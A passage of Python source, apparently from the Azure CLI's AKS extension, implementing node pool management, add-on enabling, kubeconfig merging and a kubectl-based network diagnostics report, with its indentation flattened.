if min_count is not None or max_count is not None:
raise CLIError('min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _create_client_secret():
# Add a special character to satsify AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id, # pylint: disable=unused-argument
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def _add_virtual_node_role_assignment(cmd, result, vnet_subnet_id):
# Remove trailing "/subnets/<SUBNET_NAME>" to get the vnet id
vnet_id = vnet_subnet_id.rpartition('/')[0]
vnet_id = vnet_id.rpartition('/')[0]
service_principal_msi_id = None
is_service_principal = False
os_type = 'Linux'
addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id.lower() != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(addon_name in result.addon_profiles) and
(hasattr(result.addon_profiles[addon_name], 'identity')) and
(hasattr(result.addon_profiles[addon_name].identity, 'object_id'))
):
logger.info('virtual node MSI exists, using it')
service_principal_msi_id = result.addon_profiles[addon_name].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual node addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find service principal or user assigned MSI for role'
'assignment')
def aks_agentpool_show(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, # pylint: disable=unused-argument,too-many-locals
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
kubernetes_version=None,
node_zones=None,
enable_node_public_ip=False,
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
os_type="Linux",
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
labels=None,
max_surge=None,
mode="User",
aks_custom_headers=None,
kubelet_config=None,
linux_os_config=None,
enable_encryption_at_host=False,
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError('Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type == "Windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
pod_subnet_id=pod_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
node_taints=taints_array,
scale_set_priority=priority,
upgrade_settings=upgradeSettings,
enable_encryption_at_host=enable_encryption_at_host,
mode=mode
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool.os_disk_type = node_osdisk_type
if kubelet_config:
agent_pool.kubelet_config = _get_kubelet_config(kubelet_config)
if linux_os_config:
agent_pool.linux_os_config = _get_linux_os_config(linux_os_config)
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool, custom_headers=headers)
def aks_agentpool_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError("The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
kubernetes_version='',
no_wait=False,
node_image_only=False,
max_surge=None):
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version.'
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
return _upgrade_single_nodepool_image_version(no_wait,
client,
resource_group_name,
cluster_name,
nodepool_name)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_get_upgrade_profile(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_update(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
max_surge=None,
mode=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
if (update_autoscaler != 1 and not tags and not mode and not max_surge):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning('Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if mode is not None:
instance.mode = mode
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None, appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id, subnet_name=subnet_name,
appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper, no_wait=no_wait)
if CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled:
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME])
monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in instance.addon_profiles:
enable_virtual_node = True
need_post_creation_role_assignment = monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if monitoring and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
# All agent pool will reside in the same vnet, we will grant vnet level Contributor role
# in later function, so using a random agent pool here is OK
random_agent_pool = result.agent_pool_profiles[0]
if random_agent_pool.vnet_subnet_id != "":
_add_virtual_node_role_assignment(cmd, result, random_agent_pool.vnet_subnet_id)
# Else, the cluster is not using custom VNet, the permission is already granted in AKS RP,
# we don't need to handle it in client side in this case.
else:
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name, name, instance)
return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True): # pylint: disable=unused-argument
return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, # pylint: disable=too-many-branches,too-many-statements
instance,
subscription_id,
resource_group_name,
name,
addons,
enable,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
no_wait=False): # pylint: disable=unused-argument
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == CONST_MONITORING_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id}
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError('The aci-connector addon requires setting a subnet name.')
addon_profile.config = {CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The open-service-mesh addon is already enabled for this managed cluster.\n'
'To change open-service-mesh configuration, run '
f'"az aks disable-addons -a open-service-mesh -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The confcom addon is already enabled for this managed cluster.\n'
'To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(enabled=False)
else:
raise CLIError("The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def aks_get_versions(cmd, client, location): # pylint: disable=unused-argument
return client.list_orchestrators(location, resource_type='managedClusters')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning('Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _handle_merge(existing, addition, key, replace):
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError('failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
print(msg)
def cloud_storage_account_service_factory(cli_ctx, kwargs):
from azure.cli.core.profiles import ResourceType, get_sdk
t_cloud_storage_account = get_sdk(cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
account_name = kwargs.pop('account_name', None)
account_key = kwargs.pop('account_key', None)
sas_token = kwargs.pop('sas_token', None)
kwargs.pop('connection_string', None)
return t_cloud_storage_account(account_name, account_key, sas_token)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
from azure.mgmt.monitor import MonitorManagementClient
diag_settings_client = get_mgmt_service_client(cli_ctx, MonitorManagementClient).diagnostic_settings
subscription_id = get_subscription_id(cli_ctx)
aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
'/managedClusters/{2}'.format(subscription_id, resource_group_name, name)
diag_settings = diag_settings_client.list(aks_resource_id)
if diag_settings.value:
return diag_settings.value[0].storage_account_id
print("No diag settings specified")
return None
def display_diagnostics_report(temp_kubeconfig_path): # pylint: disable=too-many-statements
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
nodes = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get", "node", "--no-headers"],
universal_newlines=True)
logger.debug(nodes)
node_lines = nodes.splitlines()
ready_nodes = {}
for node_line in node_lines:
columns = node_line.split()
logger.debug(node_line)
if columns[1] != "Ready":
logger.warning("Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
else:
ready_nodes[columns[0]] = False
logger.debug('There are %s ready nodes in the cluster', str(len(ready_nodes)))
if not ready_nodes:
logger.warning('No nodes are ready in the current cluster. Diagnostics info might not be available.')
network_config_array = []
network_status_array = []
apds_created = False
max_retry = 10
for retry in range(0, max_retry):
if not apds_created:
apd = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get", "apd", "-n", "aks-periscope", "--no-headers"],
universal_newlines=True
)
apd_lines = apd.splitlines()
if apd_lines and 'No resources found' in apd_lines[0]:
apd_lines.pop(0)
print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
len(ready_nodes),
'.' * retry), end='')
if len(apd_lines) < len(ready_nodes):
time.sleep(3)
else:
apds_created = True
print()
else:
for node_name in ready_nodes:
if ready_nodes[node_name]:
continue
apdName = "aks-periscope-diagnostic-" + node_name
try:
network_config = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
universal_newlines=True)
logger.debug('Dns status for node %s is %s', node_name, network_config)
network_status = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
universal_newlines=True)
logger.debug('Network status for node %s is %s', node_name, network_status)
if not network_config or not network_status:
print("The diagnostics information for node {} is not ready yet. "
"Will try again in 10 seconds.".format(node_name))
time.sleep(10)
break
network_config_array += json.loads('[' + network_config + ']')
network_status_object = json.loads(network_status)
network_status_array += format_diag_status(network_status_object)
ready_nodes[node_name] = True
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
print()
if network_config_array:
print("Below are the network configuration for each node: ")
print()
print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
print()
else:
logger.warning("Could not get network config. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
if network_status_array:
print("Below are the network connectivity results for each node:")
print()
print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
else:
logger.warning("Could not get networking status. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
for diag in diag_status:
if diag["Status"]:
if "Error:" in diag["Status"]:
diag["Status"] = f'{colorama.Fore.RED}{diag["Status"]}{colorama.Style.RESET_ALL}'
else:
diag["Status"] = f'{colorama.Fore.GREEN}{diag["Status"]}{colorama.Style.RESET_ALL}'
return diag_status
def format_bright(msg):
return f'\033[1m{colorama.Style.BRIGHT}{msg}{colorama.Style.RESET_ALL}'
def format_hyperlink(the_link):
return f'\033[1m{colorama.Style.BRIGHT}{colorama.Fore.BLUE}{the_link}{colorama.Style.RESET_ALL}'
def get_aks_custom_headers(aks_custom_headers=None):
headers = {}
if aks_custom_headers is not None:
if aks_custom_headers != "":
for pair in aks_custom_headers.split(','):
parts = pair.split('=')
if len(parts) != 2:
raise CLIError('custom headers format is incorrect')
headers[parts[0]] = parts[1]
return headers
def _put_managed_cluster_ensuring_permission(
cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
subscription_id,
resource_group_name,
name,
managed_cluster,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
need_grant_vnet_permission_to_cluster_identity,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait
):
# some addons require post cluster creation role assigment
need_post_creation_role_assignment = (monitoring_addon_enabled or
ingress_appgw_addon_enabled or
(enable_managed_identity and attach_acr) or
virtual_node_addon_enabled or
need_grant_vnet_permission_to_cluster_identity)
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
cluster = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
custom_headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(cluster, cmd)
if virtual_node_addon_enabled:
_add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
if need_grant_vnet_permission_to_cluster_identity:
if not _create_role_assignment(cmd.cli_ctx, 'Network Contributor',
cluster.identity.principal_id, scope=vnet_subnet_id,
resolve_assignee=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if cluster.identity_profile is None or \
cluster.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach '
'acr to it, you can manually grant permission to the identity '
'named <ClUSTER_NAME>-agentpool in MC_ resource group to give '
'it permission to pull from ACR.')
else:
kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
else:
cluster = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
custom_headers=headers)
return cluster
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or managed_cluster.identity.type.casefold() == "userassigned"))
def _get_kubelet_config(file_path):
kubelet_config = get_file_json(file_path)
if not isinstance(kubelet_config, dict):
raise CLIError("Error reading kubelet configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = KubeletConfig()
config_object.cpu_manager_policy = kubelet_config.get("cpuManagerPolicy", None)
config_object.cpu_cfs_quota = kubelet_config.get("cpuCfsQuota", None)
config_object.cpu_cfs_quota_period = kubelet_config.get("cpuCfsQuotaPeriod", None)
config_object.image_gc_high_threshold = kubelet_config.get("imageGcHighThreshold", None)
config_object.image_gc_low_threshold = kubelet_config.get("imageGcLowThreshold", None)
config_object.topology_manager_policy = kubelet_config.get("topologyManagerPolicy", None)
config_object.allowed_unsafe_sysctls = kubelet_config.get("allowedUnsafeSysctls", None)
config_object.fail_swap_on = kubelet_config.get("failSwapOn", None)
return config_object
def _get_linux_os_config(file_path):
os_config = get_file_json(file_path)
if not isinstance(os_config, dict):
raise CLIError("Error reading Linux OS configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = LinuxOSConfig()
config_object.transparent_huge_page_enabled = os_config.get("transparentHugePageEnabled", None)
config_object.transparent_huge_page_defrag = os_config.get("transparentHugePageDefrag", None)
config_object.swap_file_size_mb = os_config.get("swapFileSizeMB", None)
# sysctl settings
sysctls = os_config.get("sysctls", None)
if not isinstance(sysctls, dict):
raise CLIError("Error reading Sysctl settings at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object.sysctls = SysctlConfig()
config_object.sysctls.net_core_somaxconn = sysctls.get("netCoreSomaxconn", None)
